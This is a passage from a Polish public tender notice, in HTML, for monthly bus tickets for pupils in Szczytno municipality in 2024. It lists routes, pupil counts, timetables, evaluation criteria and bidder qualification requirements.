etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II - Zakup biletów miesięcznych dla uczniów zamieszkałych na terenie gminy Szczytno dojeżdżających do placówek oświatowych (Olszyny) w 2024 roku<br/><br/>Adresy szkół i przedszkoli oraz godziny początku zajęć lekcyjnych: <br/>1)	Szkoła Podstawowa w Olszynach, Olszyny 30, - godz. 8:00<br/><br/>Transport osób do szkół lub przedszkoli, liczba osób, maksymalny czas dojazdu ucznia z miejscowości zamieszkania do szkoły (przedszkola) oraz odległość w kilometrach od szkoły (przedszkola) do miejscowości: <br/>1) Szkoła Podstawowa w Olszynach, Olszyny 30 (na godz. 7:50) z miejscowości: Niedźwiedzie (4,9 km) – 18 osób, Gawrzyjałki (8,8 km) – 10 osób, Jeruty (4,1 km) – 1 osoba, maksymalny czas dojazdu wynosi 30 minut licząc od miejscowości położonej najdalej od szkoły.<br/><br/>Powrót z Szkoła Podstawowa w Olszynach do miejscowości: <br/>Poniedziałek: <br/>o godz. 13:30: Niedźwiedzie – 16 osób, Gawrzyjałki – 7 osób;<br/>o godz. 15:10: Niedźwiedzie – 2 osoby, Gawrzyjałki – 3 osoby, Jeruty – 1 osoba. <br/>Wtorek: <br/>o godz. 13:30: Niedźwiedzie – 16 osób, Gawrzyjałki – 7 osób;<br/>o godz. 15:10: Niedźwiedzie – 2 osoby, Gawrzyjałki – 3 osoby, Jeruty – 1 osoba. <br/>Środa: <br/>o godz. 13:30: Niedźwiedzie – 18 osób, Gawrzyjałki – 8 osób;<br/>o godz. 15:10: Gawrzyjałki – 2 osoby, Jeruty – 1 osoba. <br/>Czwartek: <br/>o godz. 13:30: Niedźwiedzie – 16 osób, Gawrzyjałki – 7 osób;<br/>o godz. 15:10: Niedźwiedzie – 2 osoby, Gawrzyjałki – 3 osoby, Jeruty – 1 osoba. <br/>Piątek: <br/>o godz. 13:30: Niedźwiedzie – 18 osób, Gawrzyjałki – 10 osób Jeruty – 1 osoba. <br/><br/>Brak drugiego kursu w piątki (sytuacja jednak może ulec zmianie). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaplecze techniczne do obsługi zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III - Zakup biletów miesięcznych dla uczniów zamieszkałych na terenie gminy Szczytno dojeżdżających do placówek oświatowych (Szczytno) w 2024 roku<br/><br/>Adresy szkół oraz godz. początku zajęć lekcyjnych: <br/>1)	Szkoła Podstawowa nr 6 w Szczytnie, ul. Bohaterów Września 1939 r. 2, - godz.8:00;<br/>2)	Szkoła Podstawowa z Oddz. Integracyjnymi nr 2 w Szczytnie, ul. W. Kętrzyńskiego 6, - godz. 8:00;<br/>3)	Sportowa Szkoła Podstawowa nr 4 w Szczytnie, ul. J. Lanca 1, 12-100 Szczytno;<br/>4)	Oddział Przedszkolny Gminnego Przedszkola w Nowinach, ul. Łomżyńska 3. <br/>Transport osób do szkół lub przedszkoli, liczba osób, maksymalny czas dojazdu ucznia z miejscowości zamieszkania do szkoły (przedszkola) oraz odległość w kilometrach od szkoły (przedszkola) do miejscowości: <br/><br/>Dowóz osób do:<br/>1)	Szkoła Podstawowa nr 6 w Szczytnie, ul. Bohaterów Września 1939 r. 2, (na godz. 7:45) z miejscowości: trasa I: Marksewo (14,3 km) – 3 osoby, Wałpusz (5,3 km) – 2 osoby, Lemany (1,9 km) – 16 osób, Zielonka (5,5 km) – 3 osoby, maksymalny czas dojazdu wynosi 40 minut licząc od miejscowości położonej najdalej od szkoły.<br/>2)	Szkoła Podstawowa z Oddz. Integracyjnymi nr 2 w Szczytnie, ul. W. Kętrzyńskiego 6, (na godz. 7:50) z miejscowości: trasa I: Marksewo (15,0 km) – 3 osoby, Stare Kiejkuty (10,5 km) – 2 osoby, Zielonka (5,5 km) – 8 osób, Wałpusz (6,0 km) – 1 osoba, Lemany (2,6 km) – 18 osób; trasa II: Dębówko (4,08 km) – 21 osób, Kobyłocha (8,0 km) – 2 osoby, Romany (4,0 km) – 22 osoby, Trelkowo (10,0 km) – 3 osoby, Ulążki (7,00 km) – 2 osoby, trasa III: Janowo (7,3 km) – 6 osób, Sędańsk (9,5 km) – 9 osób, maksymalny czas dojazdu wynosi 40 minut licząc od miejscowości położonej najdalej od szkoły.<br/>3)	Sportowa Szkoła Podstawowa nr 4 w Szczytnie, ul. J. Lanca 1, z miejscowości: trasa I: Lemany (2,6 km) – 3 osoby, Stare Kiejkuty (10,5 km) – 1 osoba, Marksewo (15,0 km) – 7 osób, maksymalny czas dojazdu wynosi 40 minut licząc od miejscowości położonej najdalej od szkoły.<br/>4)	Oddział Przedszkolny Gminnego Przedszkola w Nowinach, który znajduje się w Szczytnie, ul. Łomżyńska 3, z miejscowości: trasa I: Marksewo (15,0 km) – 1 osoba, Dębówko (4,08 km) – 3 osoby, Zielonka (5,5 km) – 1 osoba, Sędańsk (9,5 km) – 1 osoba, Lemany (2,6 km) – 1 osoba, Wałpusz (6,0 km) – 1 osoba, maksymalny czas dojazdu wynosi 40 minut licząc od miejscowości położonej najdalej od szkoły.<br/><br/>* - trasa – istnieje możliwość zmian w zakresie danej trasy<br/><br/>Powrót ze szkoły lub przedszkola: <br/>1)	Szkoła Podstawowa nr 6 w Szczytnie do miejscowości: <br/>Poniedziałek: <br/>o godz. 13:40: Marksewo – 1 osoba, Wałpusz – 1 osoba, Lemany – 10 osób, Zielonka – 2 osoby;<br/>o godz. 16:20: Marksewo – 2 osoby, Wałpusz – 1 osoba, Lemany – 6 osób, Zielonka – 1 osoba. <br/>Wtorek: <br/>o godz. 13:40: Marksewo – 1 osoba, Wałpusz – 1 osoba, Lemany – 10 osób, Zielonka – 2 osoby;<br/>o godz. 16:20: Marksewo – 2 osoby, Wałpusz – 1 osoba, Lemany – 6 osób, Zielonka – 1 osoba. <br/>Środa: <br/>o godz. 13:40: Marksewo – 1 osoba, Wałpusz – 1 osoba, Lemany – 10 osób, Zielonka – 2 osoby;<br/>o godz. 16:20: Marksewo – 2 osoby, Wałpusz – 1 osoba, Lemany – 6 osób, Zielonka – 1 osoba. <br/>Czwartek: <br/>o godz. 13:40: Marksewo – 1 osoba, Wałpusz – 1 osoba, Lemany – 10 osób, Zielonka – 2 osoby;<br/>o godz. 16:20: Marksewo – 2 osoby, Wałpusz – 1 osoba, Lemany – 6 osób, Zielonka – 1 osoba. <br/>Piątek: <br/>o godz. 13:40: Marksewo – 1 osoba, Wałpusz – 1 osoba, Lemany – 10 osób, Zielonka – 2 osoby;<br/>o godz. 16:20: Marksewo – 2 osoby, Wałpusz – 1 osoba, Lemany – 6 osób, Zielonka – 1 osoba. <br/><br/>2)	ze Szkoły Podstawowej z Oddz. Integracyjnymi nr 2 w Szczytnie do miejscowości: <br/>Poniedziałek: <br/>o godz. 13:45: Lemany – 6 osób, Zielonka – 4 osoby, Stare Kiejkuty – 1 osoba, Marksewo – 2 osoby, Dębówko – 20 osób, Kobyłocha – 2 osoby, Ulążki – 1 osoba, Trelkowo – 2 osoby, Romany - 20 osób, Janowo – 4 osoby, Sędańsk – 5 osób;<br/>o godz. 16:15: Lemany – 12 osób, Zielonka – 4 osoby, Wałpusz – 1 osoba, Stare Kiejkuty – 1 osoba, Marksewo – 1 osoba, Dębówko – 1 osoba, Ulążki – 1 osoba, Trelkowo – 1 osoba, Romany 2 - osoby, Janowo – 2 osoby, Sędańsk – 4 osoby.<br/>Wtorek: <br/>o godz. 13:45: Lemany – 4 osoby, Zielonka – 3 osoby, Stare Kiejkuty – 1 osoba, Dębówko – 20 osób, Kobyłocha – 1 osoba, Ulążki – 1 osoba, Trelkowo – 2 osoby, Romany - 20 osób, Janowo – 4 osoby, Sędańsk – 4 osoby;<br/>o godz. 16:15: Lemany – 14 osób, Zielonka – 5 osób, Wałpusz – 1 osoba, Stare Kiejkuty – 1 osoba, Marksewo – 3 osoby, Dębówko – 1 osoba, Kobyłocha – 1 osoba, Ulążki – 1 osoba, Trelkowo – 1 osoba, Romany - 2 osoby, Janowo – 2 osoby, Sędańsk – 5 osób.<br/>Środa: <br/>o godz. 13:45: Lemany – 6 osób, Zielonka – 4 osoby, Marksewo – 1 osoba, Dębówko – 10 osób, Kobyłocha – 2 osoby, Ulążki – 1 osoba, Trelkowo – 2 osoby, Romany - 16 osób, Janowo – 6 osób, Sędańsk – 4 osoby;<br/>o godz. 16:15: Lemany – 12 osób, Zielonka – 4 osoby, Wałpusz – 1 osoba, Stare Kiejkuty – 2 osoby, Marksewo – 2 osoby, Dębówko – 11 osób, Ulążki – 1 osoba, Trelkowo – 1 osoba, Romany - 6 osób, Sędańsk – 5 osób.<br/>Czwartek: <br/>o godz. 13:45: Lemany – 9 osób, Zielonka – 5 osób, Stare Kiejkuty – 2 osoby, Marksewo – 1 osoba, Dębówko – 10 osób, Kobyłocha – 2 osoby, Ulążki – 1 osoba, Trelkowo – 2 osoby, Romany - 15 osób, Janowo – 6 osób, Sędańsk – 7 osób;<br/>o godz. 16:15: Lemany – 9 osób, Zielonka – 3 osoby, Wałpusz – 1 osoba, Marksewo – 2 osoby, Dębówko – 11 osób, Ulążki – 1 osoba, Trelkowo – 1 osoba, Romany - 7 osób, Sędańsk – 2 osoby.<br/>Piątek: <br/>o godz. 13:45: Lemany – 7 osób, Zielonka – 6 osób, Wałpusz – 1 osoba, Stare Kiejkuty – 1 osoba, Marksewo – 1 osoba, Dębówko – 10 osób, Kobyłocha – 2 osoby, Ulążki – 1 osoba, Trelkowo – 2 osoby, Romany - 20 osób, Janowo –6 osób, Sędańsk – 7 osób;<br/>o godz. 16:15: Lemany – 11 osób, Zielonka – 2 osoby, Stare Kiejkuty – 1 osoba, Marksewo – 2 osoby, Dębówko – 11 osób, Ulążki – 1 osoba, Trelkowo – 1 osoba, Romany - 2 osoby, Sędańsk – 2 osoby.<br/>3)	ze Sportowej Szkoły Podstawowej nr 4 w Szczytnie do miejscowości: <br/>Poniedziałek: <br/>o godz. 13:35: Lemany – 1 osoba, Marksewo – 3 osoby;<br/>o godz. 16:25: Stare Kiejkuty – 1 osoba, Marksewo – 4 osoby, Lemany – 2 osoby. <br/>Wtorek: <br/>o godz. 13:35: Stare Kiejkuty – 1 osoba, Lemany – 1 osoba, Marksewo – 3 osoby;<br/>o godz. 16:25: Marksewo – 4 osoby, Lemany – 2 osoby.<br/>Środa: <br/>o godz. 13:35: Stare Kiejkuty – 1 osoba, Lemany – 1 osoba, Marksewo – 3 osoby;<br/>o godz. 16:25: Marksewo – 4 osoby, Lemany – 2 osoby.<br/>Czwartek: <br/>o godz. 13:35: Lemany – 1 osoba, Marksewo – 3 osoby;<br/>o godz. 16:25: Stare Kiejkuty – 1 osoba, Marksewo – 4 osoby, Lemany – 2 osoby. <br/>Piątek: <br/>o godz. 13:35: Lemany – 1 osoba, Marksewo – 3 osoby;<br/>o godz. 16:25: Stare Kiejkuty – 1 osoba, Marksewo – 4 osoby, Lemany – 2 osoby. <br/><br/>4)	Oddział Przedszkolny Gminnego Przedszkola w Nowinach, który znajduje się w Szczytnie, ul. Łomżyńska 3, do miejscowości: Marksewo – 1 osoba, Dębówko – 3 osoby, Zielonka – 1 osoba, Sędańsk – 1 osoba, Lemany – 1 osoba, Wałpusz – 1 osoba. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaplecze techniczne do obsługi zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV - Zakup biletów miesięcznych dla uczniów zamieszkałych na terenie gminy Szczytno dojeżdżających do placówek oświatowych (Szymany, Nowiny) w 2024 roku<br/><br/>Adresy szkół i przedszkoli oraz godz. początku zajęć lekcyjnych: <br/>1)	Szkoła Podstawowa w Szymanach, Szymany 21, - godz.8:00;<br/>2)	Gminne Przedszkole w Nowinach, Nowiny 31. <br/><br/>Transport osób do szkół lub przedszkoli, liczba osób, maksymalny czas dojazdu ucznia z miejscowości zamieszkania do szkoły (przedszkola) oraz odległość w kilometrach od szkoły (przedszkola) do miejscowości:<br/><br/>1)	do Szkoły Podstawowej w Szymanach na godz. 7:55 z miejscowości: Siódmak (5,3 km) –10 osób, Wólka Szczycieńska (5,3 km) – 2 osoby, Sasek Mały (10,5 km) – 2 osoby, Sasek Wielki (9,2 km) – 9 osób, Szymanki (2,6 km) – 16 osób, Nowiny (2,5 km) – 20 osób, maksymalny czas dojazdu wynosi 35 minut licząc od miejscowości położonej najdalej od szkoły.<br/>2)	do Gminnego Przedszkola w Nowinach na godz. 7:30 z miejscowości: Siódmak (3,3 km) – 2 osoby, Sasek Wielki (7,3 km) – 2 osoby, Sasek Mały (10,5 km) – 1 osoba, Szymanki (4,9 km) – 1 osoba, Szymany (2,5 km) – 9 osób, maksymalny czas dojazdu wynosi 35 minut licząc od miejscowości położonej najdalej od szkoły.<br/><br/>Powrót ze szkoły lub przedszkola:<br/>1)	Szkoła Podstawowa w Szymanach do miejscowości:<br/>Poniedziałek: <br/>o godz. 12:40: Nowiny – 11 osób, Sasek Wielki – 4 osoby, Szymanki – 8 osób, Siódmak – 6 osób, Wólka Szczycieńska – 1 osoba;<br/>o godz. 15:20: Nowiny – 9 osób, Sasek Mały – 2 osoby, Szymanki – 8 osób, Siódmak – 4 osoby, Wólka Szczycieńska – 1 osoba, Sasek Wielki – 5 osób. <br/>Wtorek: <br/>o godz. 12:40: Nowiny – 9 osób, Sasek Wielki – 2 osoby, Szymanki – 5 osób, Siódmak – 5 osób, Wólka Szczycieńska – 1 osoba;<br/>o godz. 15:20: Nowiny – 11 osób, Sasek Mały – 2 osoby, Szymanki – 11 osób, Siódmak – 5 osób, Wólka Szczycieńska – 1 osoba, Sasek Wielki – 7 osób. <br/>Środa: <br/>o godz. 12:40: Szymanki – 14 osób, Siódmak – 8 osób, Sasek Wielki – 8 osób, Sasek Mały – 1 osoba, Nowiny – 15 osób, Wólka Szczycieńska – 2 osoby;<br/>o godz. 14:30: Szymanki – 2 osoby, Siódmak – 2 osoby, Sasek Wielki – 1 osoba, Sasek Mały – 1 osoba, Nowiny – 5 osób. <br/>Czwartek: <br/>o godz. 12:40: Szymanki – 7 osób, Siódmak – 5 osób, Sasek Wielki – 4 osoby, Nowiny – 12 osób, Wólka Szczycieńska – 1 osoba;<br/>o godz. 14:30: Szymanki – 9 osób, Siódmak –5 osób, Sasek Wielki –5 osób, Sasek Mały – 2 osoby, Nowiny – 8 osób, Wólka Szczycieńska – 1 osoba. <br/>Piątek: <br/>o godz. 12:40: Szymanki – 7 osób, Siódmak – 5 osób, Sasek Wielki – 4 osoby, Nowiny – 12 osób, Wólka Szczycieńska – 1 osoba;<br/>o godz. 14:30: Szymanki – 9 osób, Siódmak –5 osób, Sasek Wielki –5 osób, Sasek Mały – 2 osoby, Nowiny – 8 osób, Wólka Szczycieńska – 1 osoba. <br/><br/>2)	Gminne Przedszkole w Nowinach do miejscowości: <br/>Poniedziałek:<br/>o godz. 12:30: Szymany – 3 osoby, Szymanki – 1 osoba;<br/>o godz. 15:10: Sasek Mały – 1 osoba, Sasek Wielki – 2 osoby, Siódmak – 2 osoby, Szymany – 6 osób. <br/>Wtorek: <br/>o godz. 12:30: Szymany – 3 osoby, Szymanki – 1 osoba;<br/>o godz. 15:10: Sasek Mały – 1 osoba, Sasek Wielki – 2 osoby, Siódmak – 2 osoby, Szymany – 6 osób. <br/>Środa: <br/>o godz. 12:30: Szymany – 3 osoby, Szymanki – 1 osoba;<br/>o godz. 15:10: Sasek Mały – 1 osoba, Sasek Wielki – 2 osoby, Siódmak – 2 osoby, Szymany – 6 osób. <br/>Czwartek: <br/>o godz. 12:30: Szymany – 3 osoby, Szymanki – 1 osoba;<br/>o godz. 15:10: Sasek Mały – 1 osoba, Sasek Wielki – 2 osoby, Siódmak – 2 osoby, Szymany – 6 osób. <br/>Piątek: <br/>o godz. 12:30: Szymany – 3 osoby, Szymanki – 1 osoba;<br/>o godz. 15:10: Sasek Mały – 1 osoba, Sasek Wielki – 2 osoby, Siódmak – 2 osoby, Szymany – 6 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaplecze techniczne do obsługi zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych w art. 112 ust. 2 ustawy pzp w zakresie dotyczącym: <br/><br/>1) zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie stawia minimalnych wymogów w przedmiotowym zakresie. <br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (t.j. Dz.U. z 2022 r. poz. 2201 z późn. zm.), ważną przez cały okres realizacji przedmiotu zamówienia. <br/><br/>3) zdolności technicznej i zawodowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:<br/> <br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną usługę polegającą na wykonywaniu regularnych przewozów osób w krajowym transporcie drogowym o wartości usługi co najmniej 80 000,00 zł brutto; <br/><br/>b) w zakresie narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada minimalne zaplecze techniczne w przypadku:<br/>części I – 3 autobusy, <br/>części II – 1 autobus, <br/>części III – 4 autobusy, <br/>części IV- 2 autobusy. <br/>Zamawiający dopuszcza możliwość transportu busami, z zachowaniem maksymalnego czasu dojazdu.<br/><br/>4) w zakresie sytuacji ekonomicznej lub finansowej <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedłoży dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) aktualną licencję na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (t.j. Dz.U. z 2022 r. poz. 2201 z późn. zm.),<br/>2) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (wzór wykazu - załącznik nr 6 do SWZ);<br/>3) wykaz narzędzi – wykaz środków transportu- wzór wykazu - załącznik nr 7 do SWZ;<br/>4) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości:<br/>Część I – 2 800,00 zł (słownie: dwa tysiące osiemset złotych 00/100)<br/>Część II – 1 700,00 zł (słownie: jeden tysiąc siedemset złotych 00/100)<br/>Część III – 3 300,00 zł (słownie: trzy tysiące trzysta złotych 00/100)<br/>Część IV – 1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia do oferty załączają:<br/>1) pełnomocnictwo do reprezentowania albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego;<br/>2) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty<br/>Ogłoszenie nr 2023/BZP 00483522/01 z dnia 2023-11-08<br/>2023-11-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>budowlane lub usługi wykonają poszczególni Wykonawcy – załącznik nr 5 do SWZ;<br/>3) oświadczenie wstępne- załączniki nr 2 i 3 do SWZ - składa każdy z Wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 